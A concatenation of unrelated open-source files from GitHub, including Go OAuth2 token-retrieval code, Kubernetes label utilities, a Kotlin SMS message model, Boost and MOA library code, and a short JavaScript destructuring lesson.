TokenType string `json:"token_type"`
RefreshToken string `json:"refresh_token"`
ExpiresIn expirationTime `json:"expires_in"` // at least PayPal returns string, while most return number
}
func (e *tokenJSON) expiry() (t time.Time) {
if v := e.ExpiresIn; v != 0 {
return time.Now().Add(time.Duration(v) * time.Second)
}
return
}
type expirationTime int32
func (e *expirationTime) UnmarshalJSON(b []byte) error {
if len(b) == 0 || string(b) == "null" {
return nil
}
var n json.Number
err := json.Unmarshal(b, &n)
if err != nil {
return err
}
i, err := n.Int64()
if err != nil {
return err
}
if i > math.MaxInt32 {
i = math.MaxInt32
}
*e = expirationTime(i)
return nil
}
// RegisterBrokenAuthHeaderProvider previously did something. It is now a no-op.
//
// Deprecated: this function no longer does anything. Caller code that
// wants to avoid potential extra HTTP requests made during
// auto-probing of the provider's auth style should set
// Endpoint.AuthStyle.
func RegisterBrokenAuthHeaderProvider(tokenURL string) {}
// AuthStyle is a copy of the golang.org/x/oauth2 package's AuthStyle type.
type AuthStyle int
const (
AuthStyleUnknown AuthStyle = 0
AuthStyleInParams AuthStyle = 1
AuthStyleInHeader AuthStyle = 2
)
// authStyleCache is the set of tokenURLs we've successfully used via
// RetrieveToken and which style auth we ended up using.
// It's called a cache, but it doesn't (yet?) shrink. It's expected that
// the set of OAuth2 servers a program contacts over time is fixed and
// small.
var authStyleCache struct {
sync.Mutex
m map[string]AuthStyle // keyed by tokenURL
}
// ResetAuthCache resets the global authentication style cache used
// for AuthStyleUnknown token requests.
func ResetAuthCache() {
authStyleCache.Lock()
defer authStyleCache.Unlock()
authStyleCache.m = nil
}
// lookupAuthStyle reports which auth style we last used with tokenURL
// when calling RetrieveToken and whether we have ever done so.
func lookupAuthStyle(tokenURL string) (style AuthStyle, ok bool) {
authStyleCache.Lock()
defer authStyleCache.Unlock()
style, ok = authStyleCache.m[tokenURL]
return
}
// setAuthStyle adds an entry to authStyleCache, documented above.
func setAuthStyle(tokenURL string, v AuthStyle) {
authStyleCache.Lock()
defer authStyleCache.Unlock()
if authStyleCache.m == nil {
authStyleCache.m = make(map[string]AuthStyle)
}
authStyleCache.m[tokenURL] = v
}
// newTokenRequest returns a new *http.Request to retrieve a new token
// from tokenURL using the provided clientID, clientSecret, and POST
// body parameters.
//
// inParams is whether the clientID & clientSecret should be encoded
// as the POST body. An 'inParams' value of true means to send it in
// the POST body (along with any values in v); false means to send it
// in the Authorization header.
func newTokenRequest(tokenURL, clientID, clientSecret string, v url.Values, authStyle AuthStyle) (*http.Request, error) {
if authStyle == AuthStyleInParams {
v = cloneURLValues(v)
if clientID != "" {
v.Set("client_id", clientID)
}
if clientSecret != "" {
v.Set("client_secret", clientSecret)
}
}
req, err := http.NewRequest("POST", tokenURL, strings.NewReader(v.Encode()))
if err != nil {
return nil, err
}
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
if authStyle == AuthStyleInHeader {
req.SetBasicAuth(url.QueryEscape(clientID), url.QueryEscape(clientSecret))
}
return req, nil
}
func cloneURLValues(v url.Values) url.Values {
v2 := make(url.Values, len(v))
for k, vv := range v {
v2[k] = append([]string(nil), vv...)
}
return v2
}
func RetrieveToken(ctx context.Context, clientID, clientSecret, tokenURL string, v url.Values, authStyle AuthStyle) (*Token, error) {
needsAuthStyleProbe := authStyle == 0
if needsAuthStyleProbe {
if style, ok := lookupAuthStyle(tokenURL); ok {
authStyle = style
needsAuthStyleProbe = false
} else {
authStyle = AuthStyleInHeader // the first way we'll try
}
}
req, err := newTokenRequest(tokenURL, clientID, clientSecret, v, authStyle)
if err != nil {
return nil, err
}
token, err := doTokenRoundTrip(ctx, req)
if err != nil && needsAuthStyleProbe {
// If we get an error, assume the server wants the
// clientID & clientSecret in a different form.
// See https://code.google.com/p/goauth2/issues/detail?id=31 for background.
// In summary:
// - Reddit only accepts client secret in the Authorization header
// - Dropbox accepts either it in URL param or Auth header, but not both.
// - Google only accepts URL param (not spec compliant?), not Auth header
// - Stripe only accepts client secret in Auth header with Bearer method, not Basic
//
// We used to maintain a big table in this code of all the sites and which way
// they went, but maintaining it didn't scale & got annoying.
// So just try both ways.
authStyle = AuthStyleInParams // the second way we'll try
req, _ = newTokenRequest(tokenURL, clientID, clientSecret, v, authStyle)
token, err = doTokenRoundTrip(ctx, req)
}
if needsAuthStyleProbe && err == nil {
setAuthStyle(tokenURL, authStyle)
}
// Don't overwrite `RefreshToken` with an empty value
// if this was a token refreshing request.
if token != nil && token.RefreshToken == "" {
token.RefreshToken = v.Get("refresh_token")
}
return token, err
}
func doTokenRoundTrip(ctx context.Context, req *http.Request) (*Token, error) {
r, err := ctxhttp.Do(ctx, ContextClient(ctx), req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(io.LimitReader(r.Body, 1<<20))
r.Body.Close()
if err != nil {
return nil, fmt.Errorf("oauth2: cannot fetch token: %v", err)
}
if code := r.StatusCode; code < 200 || code > 299 {
return nil, &RetrieveError{
Response: r,
Body: body,
}
}
var token *Token
content, _, _ := mime.ParseMediaType(r.Header.Get("Content-Type"))
switch content {
case "application/x-www-form-urlencoded", "text/plain":
vals, err := url.ParseQuery(string(body))
if err != nil {
return nil, err
}
token = &Token{
AccessToken: vals.Get("access_token"),
TokenType: vals.Get("token_type"),
RefreshToken: vals.Get("refresh_token"),
Raw: vals,
}
e := vals.Get("expires_in")
expires, _ := strconv.Atoi(e)
if expires != 0 {
token.Expiry = time.Now().Add(time.Duration(expires) * time.Second)
}
default:
var tj tokenJSON
if err = json.Unmarshal(body, &tj); err != nil {
return nil, err
}
token = &Token{
AccessToken: tj.AccessToken,
TokenType: tj.TokenType,
RefreshToken: tj.RefreshToken,
Expiry: tj.expiry(),
Raw: make(map[string]interface{}),
}
json.Unmarshal(body, &token.Raw) // no error checks for optional fields
}
if token.AccessToken == "" {
return nil, errors.New("oauth2: server response missing access_token")
}
return token, nil
}
type RetrieveError struct {
Response *http.Response
Body []byte
}
func (r *RetrieveError) Error() string {
return fmt.Sprintf("oauth2: cannot fetch token: %v\nResponse: %s", r.Response.Status, r.Body)
}
| {
"pile_set_name": "Github"
} |
# Download the Ruby helper library from twilio.com/docs/libraries/ruby
require 'twilio-ruby'
# Get your Account Sid and Auth Token from https://www.twilio.com/console
account_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth_token = 'your_auth_token'
client = Twilio::REST::Client.new(account_sid, auth_token)
service = client.notify.v1.services('ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
response = service.delete
puts response
| {
"pile_set_name": "Github"
} |
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package labels
import (
"fmt"
"sort"
"strings"
)
// Labels allows you to present labels independently from their storage.
type Labels interface {
// Has returns whether the provided label exists.
Has(label string) (exists bool)
// Get returns the value for the provided label.
Get(label string) (value string)
}
// Set is a map of label:value. It implements Labels.
type Set map[string]string
// String returns all labels listed as a human readable string.
// Conveniently, exactly the format that ParseSelector takes.
func (ls Set) String() string {
selector := make([]string, 0, len(ls))
for key, value := range ls {
selector = append(selector, key+"="+value)
}
// Sort for determinism.
sort.StringSlice(selector).Sort()
return strings.Join(selector, ",")
}
// Has returns whether the provided label exists in the map.
func (ls Set) Has(label string) bool {
_, exists := ls[label]
return exists
}
// Get returns the value in the map for the provided label.
func (ls Set) Get(label string) string {
return ls[label]
}
// AsSelector converts labels into a selectors.
func (ls Set) AsSelector() Selector {
return SelectorFromSet(ls)
}
// AsSelectorPreValidated converts labels into a selector, but
// assumes that labels are already validated and thus don't
// preform any validation.
// According to our measurements this is significantly faster
// in codepaths that matter at high scale.
func (ls Set) AsSelectorPreValidated() Selector {
return SelectorFromValidatedSet(ls)
}
// FormatLabels convert label map into plain string
func FormatLabels(labelMap map[string]string) string {
l := Set(labelMap).String()
if l == "" {
l = "<none>"
}
return l
}
// Conflicts takes 2 maps and returns true if there a key match between
// the maps but the value doesn't match, and returns false in other cases
func Conflicts(labels1, labels2 Set) bool {
small := labels1
big := labels2
if len(labels2) < len(labels1) {
small = labels2
big = labels1
}
for k, v := range small {
if val, match := big[k]; match {
if val != v {
return true
}
}
}
return false
}
// Merge combines given maps, and does not check for any conflicts
// between the maps. In case of conflicts, second map (labels2) wins
func Merge(labels1, labels2 Set) Set {
mergedMap := Set{}
for k, v := range labels1 {
mergedMap[k] = v
}
for k, v := range labels2 {
mergedMap[k] = v
}
return mergedMap
}
// Equals returns true if the given maps are equal
func Equals(labels1, labels2 Set) bool {
if len(labels1) != len(labels2) {
return false
}
for k, v := range labels1 {
value, ok := labels2[k]
if !ok {
return false
}
if value != v {
return false
}
}
return true
}
// AreLabelsInWhiteList verifies if the provided label list
// is in the provided whitelist and returns true, otherwise false.
func AreLabelsInWhiteList(labels, whitelist Set) bool {
if len(whitelist) == 0 {
return true
}
for k, v := range labels {
value, ok := whitelist[k]
if !ok {
return false
}
if value != v {
return false
}
}
return true
}
// ConvertSelectorToLabelsMap converts selector string to labels map
// and validates keys and values
func ConvertSelectorToLabelsMap(selector string) (Set, error) {
labelsMap := Set{}
if len(selector) == 0 {
return labelsMap, nil
}
labels := strings.Split(selector, ",")
for _, label := range labels {
l := strings.Split(label, "=")
if len(l) != 2 {
return labelsMap, fmt.Errorf("invalid selector: %s", l)
}
key := strings.TrimSpace(l[0])
if err := validateLabelKey(key); err != nil {
return labelsMap, err
}
value := strings.TrimSpace(l[1])
if err := validateLabelValue(key, value); err != nil {
return labelsMap, err
}
labelsMap[key] = value
}
return labelsMap, nil
}
| {
"pile_set_name": "Github"
} |
1
3
a a a
| {
"pile_set_name": "Github"
} |
<template>
<div class="movie-list-cell">
<h4>{{ $t('movie.history') }}<a href="">{{ $t('common.browseMore.seemore') }}</a></h4>
<i-row>
<i-col :xs="12" :sm="12" :md="8" :lg="6" v-for="movie in movies" :key="movie.id">
<div class="list">
<movie-list-item :movie="movie"></movie-list-item>
</div>
</i-col>
</i-row>
</div>
</template>
<script type="text/ecmascript-6">
import MovieListItem from '@/components/views/Movie/MovieListItem';
export default {
name: 'movie-list-cell',
props: {
movies: {
Type: Array
}
},
components: {
'movie-list-item': MovieListItem
}
};
</script>
<style lang="stylus" type="text/stylus" rel="stylesheet/stylus">
@import "../../../common/stylus/theme.styl";
.movie-list-cell
border 1px solid $default-border-color
padding 10px
h4
font-size 26px
line-height 30px
padding 10px 20px 10px 10px
a
font-size 16px
float right
.list
padding 10px
a
.info
height 30%
padding 8px
@media only screen and (max-width: 768px)
height 20%
@media screen and (min-width: 768px)
height 20%
@media screen and (min-width: 992px)
height 30%
@media screen and (min-width: 1200px)
height 30%
.title
margin-bottom 5px
@media only screen and (max-width: 768px)
font-size 16px
line-height 18px
@media screen and (min-width: 768px)
font-size 18px
line-height 21px
@media screen and (min-width: 992px)
font-size 18px
line-height 21px
@media screen and (min-width: 1200px)
font-size 17px
line-height 20px
.desc
@media only screen and (max-width: 768px)
font-size 12px
line-height 14px
@media screen and (min-width: 768px)
font-size 14px
line-height 17px
@media screen and (min-width: 992px)
font-size 14px
line-height 17px
@media screen and (min-width: 1200px)
font-size 13px
line-height 15px
&:hover
.info
@media only screen and (max-width: 768px)
height 22%
@media screen and (min-width: 768px)
height 22%
@media screen and (min-width: 992px)
height 35%
@media screen and (min-width: 1200px)
height 35%
</style>
| {
"pile_set_name": "Github"
} |
libavcodec/s302m.o: libavcodec/s302m.c libavutil/intreadwrite.h \
libavutil/avconfig.h libavutil/attributes.h libavutil/bswap.h config.h \
libavutil/opt.h libavutil/rational.h libavutil/avutil.h \
libavutil/common.h libavutil/macros.h libavutil/version.h \
libavutil/intmath.h libavutil/mem.h libavutil/error.h \
libavutil/internal.h libavutil/timer.h libavutil/log.h libavutil/cpu.h \
libavutil/dict.h libavutil/pixfmt.h libavutil/libm.h \
libavutil/intfloat.h libavutil/mathematics.h libavutil/samplefmt.h \
libavutil/log.h libavcodec/avcodec.h libavutil/samplefmt.h \
libavutil/attributes.h libavutil/avutil.h libavutil/buffer.h \
libavutil/cpu.h libavutil/channel_layout.h libavutil/dict.h \
libavutil/frame.h libavutil/buffer.h libavutil/pixfmt.h \
libavutil/rational.h libavcodec/version.h libavutil/version.h \
libavcodec/internal.h libavutil/mathematics.h libavcodec/mathops.h \
libavutil/common.h
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2020, ARM Limited and Contributors. All rights reserved.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
#ifndef PLATFORM_DEF_H
#define PLATFORM_DEF_H
#include <lib/utils_def.h>
#include <sgi_base_platform_def.h>
#define PLAT_ARM_CLUSTER_COUNT U(4)
#define CSS_SGI_MAX_CPUS_PER_CLUSTER U(1)
#define CSS_SGI_MAX_PE_PER_CPU U(1)
#define PLAT_CSS_MHU_BASE UL(0x45400000)
#define PLAT_MHUV2_BASE PLAT_CSS_MHU_BASE
#define CSS_SYSTEM_PWR_DMN_LVL ARM_PWR_LVL2
#define PLAT_MAX_PWR_LVL ARM_PWR_LVL1
/* Virtual address used by dynamic mem_protect for chunk_base */
#define PLAT_ARM_MEM_PROTEC_VA_FRAME UL(0xC0000000)
/* Physical and virtual address space limits for MMU in AARCH64 mode */
#define PLAT_PHY_ADDR_SPACE_SIZE CSS_SGI_REMOTE_CHIP_MEM_OFFSET( \
CSS_SGI_CHIP_COUNT)
#define PLAT_VIRT_ADDR_SPACE_SIZE CSS_SGI_REMOTE_CHIP_MEM_OFFSET( \
CSS_SGI_CHIP_COUNT)
/* GIC related constants */
#define PLAT_ARM_GICD_BASE UL(0x30000000)
#define PLAT_ARM_GICC_BASE UL(0x2C000000)
#define PLAT_ARM_GICR_BASE UL(0x30140000)
#endif /* PLATFORM_DEF_H */
| {
"pile_set_name": "Github"
} |
/*
* RelativeMeanAbsoluteDeviationMT.java
* Copyright (C) 2017 University of Porto, Portugal
* @author J. Duarte, J. Gama
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*
*/
package moa.classifiers.rules.multilabel.errormeasurers;
import com.yahoo.labs.samoa.instances.Prediction;
/**
* Relative Mean Absolute Deviation for multitarget and with fading factor
*/
public class RelativeMeanAbsoluteDeviationMT extends AbstractMultiTargetErrorMeasurer {
/**
*
*/
protected double weightSeen;
protected double [] sumError;
protected double [] sumY;
protected double [] sumErrorToTargetMean;
private static final long serialVersionUID = 1L;
protected boolean hasStarted;
protected int numLearnedOutputs;
@Override
public void addPrediction(Prediction prediction, Prediction trueClass, double weight) {
int numOutputs=prediction.numOutputAttributes();
if (!hasStarted){
sumError=new double[numOutputs];
sumY=new double[numOutputs];
sumErrorToTargetMean=new double[numOutputs];
hasStarted=true;
for(int i=0; i<numOutputs;i++)
if(prediction.hasVotesForAttribute(i))
++numLearnedOutputs;
hasStarted=true;
}
weightSeen=weight+fadingErrorFactor*weightSeen;
for(int i=0; i<numOutputs;i++){
if(prediction.hasVotesForAttribute(i)){
sumError[i]=Math.abs(prediction.getVote(i, 0)-trueClass.getVote(i, 0))*weight+fadingErrorFactor*sumError[i];
sumY[i]=trueClass.getVote(i, 0)*weight+fadingErrorFactor*sumY[i];
double errorOutputTM=Math.abs(prediction.getVote(i, 0)-sumY[i]/weightSeen); //error to target mean
sumErrorToTargetMean[i]=errorOutputTM*weight+fadingErrorFactor*sumErrorToTargetMean[i];
}
}
}
@Override
public double getCurrentError() {
if(weightSeen==0)
return Double.MAX_VALUE;
else
{
double sum=0;
int numOutputs=sumError.length;
for (int i=0; i<numOutputs; i++)
sum+=getCurrentError(i);
return sum/numLearnedOutputs;
}
}
@Override
public double getCurrentError(int index) {
return sumError[index]/sumErrorToTargetMean[index];
}
@Override
public double[] getCurrentErrors() {
double [] errors=null;
if(sumError!=null){
errors=new double[sumError.length];
for (int i=0;i<sumError.length; i++)
errors[i]=getCurrentError(i);
}
return errors;
}
}
| {
"pile_set_name": "Github"
} |
#ifndef BOOST_ARCHIVE_DETAIL_POLYMORPHIC_OARCHIVE_ROUTE_HPP
#define BOOST_ARCHIVE_DETAIL_POLYMORPHIC_OARCHIVE_ROUTE_HPP
// MS compatible compilers support #pragma once
#if defined(_MSC_VER)
# pragma once
#endif
/////////1/////////2/////////3/////////4/////////5/////////6/////////7/////////8
// polymorphic_oarchive_route.hpp
// (C) Copyright 2002 Robert Ramey - http://www.rrsd.com .
// Use, modification and distribution is subject to the Boost Software
// License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// See http://www.boost.org for updates, documentation, and revision history.
#include <string>
#include <ostream>
#include <cstddef> // size_t
#include <boost/config.hpp>
#if defined(BOOST_NO_STDC_NAMESPACE)
namespace std{
using ::size_t;
} // namespace std
#endif
#include <boost/cstdint.hpp>
#include <boost/integer_traits.hpp>
#include <boost/archive/polymorphic_oarchive.hpp>
#include <boost/archive/detail/abi_prefix.hpp> // must be the last header
namespace boost {
namespace serialization {
class extended_type_info;
} // namespace serialization
namespace archive {
namespace detail{
class BOOST_ARCHIVE_DECL(BOOST_PP_EMPTY()) basic_oserializer;
class BOOST_ARCHIVE_DECL(BOOST_PP_EMPTY()) basic_pointer_oserializer;
#ifdef BOOST_MSVC
# pragma warning(push)
# pragma warning(disable : 4511 4512)
#endif
template<class ArchiveImplementation>
class polymorphic_oarchive_route :
public polymorphic_oarchive,
// note: gcc dynamic cross cast fails if the the derivation below is
// not public. I think this is a mistake.
public /*protected*/ ArchiveImplementation
{
private:
// these are used by the serialization library.
virtual void save_object(
const void *x,
const detail::basic_oserializer & bos
){
ArchiveImplementation::save_object(x, bos);
}
virtual void save_pointer(
const void * t,
const detail::basic_pointer_oserializer * bpos_ptr
){
ArchiveImplementation::save_pointer(t, bpos_ptr);
}
virtual void save_null_pointer(){
ArchiveImplementation::save_null_pointer();
}
// primitive types the only ones permitted by polymorphic archives
virtual void save(const bool t){
ArchiveImplementation::save(t);
}
virtual void save(const char t){
ArchiveImplementation::save(t);
}
virtual void save(const signed char t){
ArchiveImplementation::save(t);
}
virtual void save(const unsigned char t){
ArchiveImplementation::save(t);
}
#ifndef BOOST_NO_CWCHAR
#ifndef BOOST_NO_INTRINSIC_WCHAR_T
virtual void save(const wchar_t t){
ArchiveImplementation::save(t);
}
#endif
#endif
virtual void save(const short t){
ArchiveImplementation::save(t);
}
virtual void save(const unsigned short t){
ArchiveImplementation::save(t);
}
virtual void save(const int t){
ArchiveImplementation::save(t);
}
virtual void save(const unsigned int t){
ArchiveImplementation::save(t);
}
virtual void save(const long t){
ArchiveImplementation::save(t);
}
virtual void save(const unsigned long t){
ArchiveImplementation::save(t);
}
#if defined(BOOST_HAS_LONG_LONG)
virtual void save(const boost::long_long_type t){
ArchiveImplementation::save(t);
}
virtual void save(const boost::ulong_long_type t){
ArchiveImplementation::save(t);
}
#elif defined(BOOST_HAS_MS_INT64)
virtual void save(const boost::int64_t t){
ArchiveImplementation::save(t);
}
virtual void save(const boost::uint64_t t){
ArchiveImplementation::save(t);
}
#endif
virtual void save(const float t){
ArchiveImplementation::save(t);
}
virtual void save(const double t){
ArchiveImplementation::save(t);
}
virtual void save(const std::string & t){
ArchiveImplementation::save(t);
}
#ifndef BOOST_NO_STD_WSTRING
virtual void save(const std::wstring & t){
ArchiveImplementation::save(t);
}
#endif
virtual library_version_type get_library_version() const{
return ArchiveImplementation::get_library_version();
}
virtual unsigned int get_flags() const {
return ArchiveImplementation::get_flags();
}
virtual void save_binary(const void * t, std::size_t size){
ArchiveImplementation::save_binary(t, size);
}
// used for xml and other tagged formats default does nothing
virtual void save_start(const char * name){
ArchiveImplementation::save_start(name);
}
virtual void save_end(const char * name){
ArchiveImplementation::save_end(name);
}
virtual void end_preamble(){
ArchiveImplementation::end_preamble();
}
virtual void register_basic_serializer(const detail::basic_oserializer & bos){
ArchiveImplementation::register_basic_serializer(bos);
}
public:
// this can't be inheriteded because they appear in mulitple
// parents
typedef mpl::bool_<false> is_loading;
typedef mpl::bool_<true> is_saving;
// the << operator
template<class T>
polymorphic_oarchive & operator<<(T & t){
return polymorphic_oarchive::operator<<(t);
}
// the & operator
template<class T>
polymorphic_oarchive & operator&(T & t){
return polymorphic_oarchive::operator&(t);
}
// register type function
template<class T>
const basic_pointer_oserializer *
register_type(T * t = NULL){
return ArchiveImplementation::register_type(t);
}
// all current archives take a stream as constructor argument
template <class _Elem, class _Tr>
polymorphic_oarchive_route(
std::basic_ostream<_Elem, _Tr> & os,
unsigned int flags = 0
) :
ArchiveImplementation(os, flags)
{}
virtual ~polymorphic_oarchive_route(){};
};
} // namespace detail
} // namespace archive
} // namespace boost
#ifdef BOOST_MSVC
#pragma warning(pop)
#endif
#include <boost/archive/detail/abi_suffix.hpp> // pops abi_suffix.hpp pragmas
#endif // BOOST_ARCHIVE_DETAIL_POLYMORPHIC_OARCHIVE_DISPATCH_HPP
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 Moez Bhatti <[email protected]>
*
* This file is part of QKSMS.
*
* QKSMS is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* QKSMS is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with QKSMS. If not, see <http://www.gnu.org/licenses/>.
*/
package com.moez.QKSMS.model
import android.content.ContentUris
import android.net.Uri
import android.provider.Telephony.*
import io.realm.RealmList
import io.realm.RealmObject
import io.realm.annotations.Index
import io.realm.annotations.PrimaryKey
open class Message : RealmObject() {
enum class AttachmentType { TEXT, IMAGE, VIDEO, AUDIO, SLIDESHOW, NOT_LOADED }
@PrimaryKey var id: Long = 0
@Index var threadId: Long = 0
// The MMS-SMS content provider returns messages where duplicate ids can exist. This is because
// SMS and MMS are stored in separate tables. We can't use these ids as our realm message id
// since it's our primary key for the single message object, so we'll store the original id in
// case we need to access the original message item in the content provider
var contentId: Long = 0
var address: String = ""
var boxId: Int = 0
var type: String = ""
var date: Long = 0
var dateSent: Long = 0
var seen: Boolean = false
var read: Boolean = false
var locked: Boolean = false
var subId: Int = -1
// SMS only
var body: String = ""
var errorCode: Int = 0
var deliveryStatus: Int = Sms.STATUS_NONE
// MMS only
var attachmentTypeString: String = AttachmentType.NOT_LOADED.toString()
var attachmentType: AttachmentType
get() = AttachmentType.valueOf(attachmentTypeString)
set(value) {
attachmentTypeString = value.toString()
}
var mmsDeliveryStatusString: String = ""
var readReportString: String = ""
var errorType: Int = 0
var messageSize: Int = 0
var messageType: Int = 0
var mmsStatus: Int = 0
var subject: String = ""
var textContentType: String = ""
var parts: RealmList<MmsPart> = RealmList()
fun getUri(): Uri {
val baseUri = if (isMms()) Mms.CONTENT_URI else Sms.CONTENT_URI
return ContentUris.withAppendedId(baseUri, contentId)
}
fun isMms(): Boolean = type == "mms"
fun isSms(): Boolean = type == "sms"
fun isMe(): Boolean {
val isIncomingMms = isMms() && (boxId == Mms.MESSAGE_BOX_INBOX || boxId == Mms.MESSAGE_BOX_ALL)
val isIncomingSms = isSms() && (boxId == Sms.MESSAGE_TYPE_INBOX || boxId == Sms.MESSAGE_TYPE_ALL)
return !(isIncomingMms || isIncomingSms)
}
fun isOutgoingMessage(): Boolean {
val isOutgoingMms = isMms() && boxId == Mms.MESSAGE_BOX_OUTBOX
val isOutgoingSms = isSms() && (boxId == Sms.MESSAGE_TYPE_FAILED
|| boxId == Sms.MESSAGE_TYPE_OUTBOX
|| boxId == Sms.MESSAGE_TYPE_QUEUED)
return isOutgoingMms || isOutgoingSms
}
/**
* Returns the text that should be copied to the clipboard
*/
fun getText(): String {
return when {
isSms() -> body
else -> parts
.filter { it.type == "text/plain" }
.mapNotNull { it.text }
.joinToString("\n") { text -> text }
}
}
/**
* Returns the text that should be displayed when a preview of the message
* needs to be displayed, such as in the conversation view or in a notification
*/
fun getSummary(): String = when {
isSms() -> body
else -> {
val sb = StringBuilder()
// Add subject
getCleansedSubject().takeIf { it.isNotEmpty() }?.run(sb::appendln)
// Add parts
parts.mapNotNull { it.getSummary() }.forEach { summary -> sb.appendln(summary) }
sb.toString().trim()
}
}
/**
* Cleanses the subject in case it's useless, so that the UI doesn't have to show it
*/
fun getCleansedSubject(): String {
val uselessSubjects = listOf("no subject", "NoSubject", "<not present>")
return if (uselessSubjects.contains(subject)) "" else subject
}
fun isSending(): Boolean {
return !isFailedMessage() && isOutgoingMessage()
}
fun isDelivered(): Boolean {
val isDeliveredMms = false // TODO
val isDeliveredSms = deliveryStatus == Sms.STATUS_COMPLETE
return isDeliveredMms || isDeliveredSms
}
fun isFailedMessage(): Boolean {
val isFailedMms = isMms() && (errorType >= MmsSms.ERR_TYPE_GENERIC_PERMANENT || boxId == Mms.MESSAGE_BOX_FAILED)
val isFailedSms = isSms() && boxId == Sms.MESSAGE_TYPE_FAILED
return isFailedMms || isFailedSms
}
fun compareSender(other: Message): Boolean = when {
isMe() && other.isMe() -> subId == other.subId
!isMe() && !other.isMe() -> subId == other.subId && address == other.address
else -> false
}
} | {
"pile_set_name": "Github"
} |
#
# WL#9263 Independent compress/decompress of BLOB pages
#
set global innodb_compression_level = 0;
create table t1 (f1 int primary key, f2 longblob)
row_format=compressed, engine=innodb;
insert into t1 values (1, repeat('+', 40000));
set debug = '+d,lob_insert_single_zstream';
insert into t1 values (2, repeat('~', 40000));
set debug = '-d,lob_insert_single_zstream';
select f1, right(f2, 40) from t1;
f1 right(f2, 40)
1 ++++++++++++++++++++++++++++++++++++++++
2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Kill and restart
select f1, right(f2, 40) from t1;
f1 right(f2, 40)
1 ++++++++++++++++++++++++++++++++++++++++
2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
drop table t1;
set global innodb_compression_level = default;
| {
"pile_set_name": "Github"
} |
---
author: alexjmackey
type: normal
category: feature
links:
- >-
[Destructuring
Assignment](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Operators/Destructuring_assignment){documentation}
---
# Destructuring (Part 1)
---
## Content
Destructuring provides a succinct and flexible way to assign values from arrays or objects.
This is best illustrated with an example. Destructuring is used below to assign `x` and `y` the values `100` and `200` in just one line of code:
```javascript
let x, y;
[x, y] = [100, 200];
// x = 100, y = 200
```
### Function Return Values
Destructuring works great with functions.
Let's say we have a function that multiplies two input arguments (x and y) by two and returns the result as an array.
Destructuring can assign the results of this operation to two variables with just one line of code:
```javascript
let x, y;
function dblNumbers(x, y) {
return [x * 2, y * 2];
}
[x, y] = dblNumbers(100, 200);
// x = 200, y = 400
```
### Swapping Variables
Destructuring can also be used to swap the contents of two variables without having to create another temporary variable:
```javascript
let x = 1;
let y = 2;
[y, x] = [x, y];
// x = 2, y = 1
```
---
## Practice
Swap `a` and `b` using destructuring:
```javascript
let a = 'foo'
let b = 'bar'
[a ???] = ???
console.log(a) // bar
console.log(b) // foo
```
- , b
- [b, a]
- [, a]
- a
- b
- , a
- [a]
- [b]
- [a, b]
- ,
---
## Revision
What will be the output of the following statements:
```javascript
function squareNums(nums) {
return nums.map(function(num) {
return num * num;
});
}
const [a, b] = squareNums([3, 4, 5]);
console.log(a);
// ???
console.log(b);
// ???
```
- 9
- 16
- error
- [9, 16]
- [16, 25]
- [9, 25]
- 25
- 0
- undefined
- null
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugAPP|Win32'">
<LocalDebuggerCommand>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\FPSC-Proto-Game.exe</LocalDebuggerCommand>
<LocalDebuggerWorkingDirectory>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\</LocalDebuggerWorkingDirectory>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugFPSC|Win32'">
<LocalDebuggerCommand>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\Guru-Game.exe</LocalDebuggerCommand>
<LocalDebuggerWorkingDirectory>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\</LocalDebuggerWorkingDirectory>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommand>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\FPSC-Proto-Game.exe</LocalDebuggerCommand>
<LocalDebuggerWorkingDirectory>F:\TGCSHARED\fpsc-reloaded\FPS Creator Files\</LocalDebuggerWorkingDirectory>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup>
<ShowAllFiles>false</ShowAllFiles>
</PropertyGroup>
</Project> | {
"pile_set_name": "Github"
} |
package com.cnswan.draginviewpager.widget;
import android.content.Context;
